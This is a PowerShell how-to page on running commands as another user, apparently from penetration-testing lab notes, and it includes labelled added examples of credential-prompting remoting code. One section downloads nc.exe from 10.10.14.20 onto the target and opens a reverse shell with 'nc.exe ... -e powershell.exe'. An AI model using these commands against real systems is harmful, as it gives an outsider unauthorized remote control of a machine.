Powershell Runas

This is how to execute commands as a different user in PowerShell (similar to `runas`).

```powershell
$Username = 'BOXNAME\user1'
$Password = 'sup3rs3cr3t123'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Invoke-Command -Computer BOXNAME -ScriptBlock { whoami }  -Credential $Cred
```
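The same Invoke-Command approach, written as an added example (not code from the original page) that prompts for the password instead of hard-coding it and checks that the remote session really runs as the requested account. It assumes WinRM is enabled on the target (Invoke-Command with -ComputerName needs it even for the local box) and that the computer and account names, 'BOXNAME' and 'BOXNAME\user1', are placeholders to replace.

```powershell
# Added example: run a command as another account over PowerShell remoting
# without leaving the password in the script or the console history.
# 'BOXNAME' and 'BOXNAME\user1' are placeholders (assumption), not real hosts.
param(
    [string]$ComputerName = 'BOXNAME',
    [string]$UserName     = 'BOXNAME\user1'
)

# Get-Credential prompts interactively, so no plaintext password is stored
# in the script, the history file or a transcript.
$Cred = Get-Credential -UserName $UserName -Message "Password for $UserName"

# Confirm the WinRM endpoint answers before trying to run anything on it.
try {
    Test-WSMan -ComputerName $ComputerName -ErrorAction Stop | Out-Null
} catch {
    throw "WinRM is not reachable on $ComputerName : $($_.Exception.Message)"
}

# Run the command remotely and return the result as an object, including
# whether the remote token is elevated (remoting sessions for local admins are).
$result = Invoke-Command -ComputerName $ComputerName -Credential $Cred -ScriptBlock {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]::new($identity)
    [pscustomobject]@{
        User     = $identity.Name
        Elevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}

# Sanity check: the session must run as the account that was requested.
# -ne is case-insensitive in PowerShell, so 'boxname\user1' still matches.
if ($result.User -ne $UserName) {
    Write-Warning "Expected $UserName but the remote session runs as $($result.User)"
}
$result
```

Run it as `.\runas-remote.ps1 -ComputerName BOXNAME -UserName 'BOXNAME\user1'`; the returned object shows the effective user and whether the remote token is elevated, which is what decides what the command can actually touch.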

To get a reverse shell as a different user:

```powershell
# Use python to share the file
python3 -m http.server 80

# Use powershell to download the file. In this case nc.exe
Invoke-Command -Computer SNIPER -ScriptBlock { IWR -uri 10.10.14.20/nc.exe -outfile nc.exe }  -Credential $Cred

# Reverse shell with powershell
Invoke-Command -Computer SNIPER -ScriptBlock { cmd /c nc.exe 10.10.14.20 9002 -e powershell.exe }  -Credential $Cred
```

Another way of doing it:

```powershell
Start-Process powershell -Credential domain\differentUserName -ArgumentList '-noprofile -command &{Start-Process "TheApp.exe" -verb runas}'
```
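The Start-Process variant as an added example (not code from the original page), showing why the one-liner above nests two Start-Process calls: -Credential and -Verb RunAs live in different parameter sets of Start-Process and cannot be combined in a single call, so the outer call switches user and the inner call, running as that user, asks for elevation. It also sets -WorkingDirectory, because a Start-Process -Credential launch fails with "The directory name is invalid" when the current directory is one the other account cannot read. 'DOMAIN\differentUserName' and 'TheApp.exe' are placeholders.

```powershell
# Added example: start a local process as another account and verify the
# owner of the new process. 'DOMAIN\differentUserName' and 'TheApp.exe' are
# placeholders (assumption), not values from the original page.
$UserName = 'DOMAIN\differentUserName'
$Cred = Get-Credential -UserName $UserName -Message "Password for $UserName"

# Outer hop: a PowerShell process running as the other account. -Credential
# cannot be combined with -Verb RunAs (different parameter sets), so the
# elevation request has to happen inside that new process.
$proc = Start-Process -FilePath 'powershell.exe' `
    -Credential $Cred `
    -WorkingDirectory 'C:\Windows\System32' `
    -ArgumentList '-NoProfile', '-Command', '& { Start-Process "TheApp.exe" -Verb RunAs }' `
    -PassThru

# Verify who owns the process we just started; GetOwner returns Domain and User.
$owner = Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.Id)" |
    Invoke-CimMethod -MethodName GetOwner

$actual = "$($owner.Domain)\$($owner.User)"
if ($actual -ne $UserName) {
    Write-Warning "Process $($proc.Id) is owned by $actual, not $UserName"
} else {
    "Process $($proc.Id) is running as $actual"
}
```

The inner Start-Process with -Verb RunAs still triggers a UAC prompt on the other account's behalf, so this only yields an elevated TheApp.exe if that account is a local administrator and someone answers the prompt; the ownership check at the end tells you whether the first hop worked at all.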
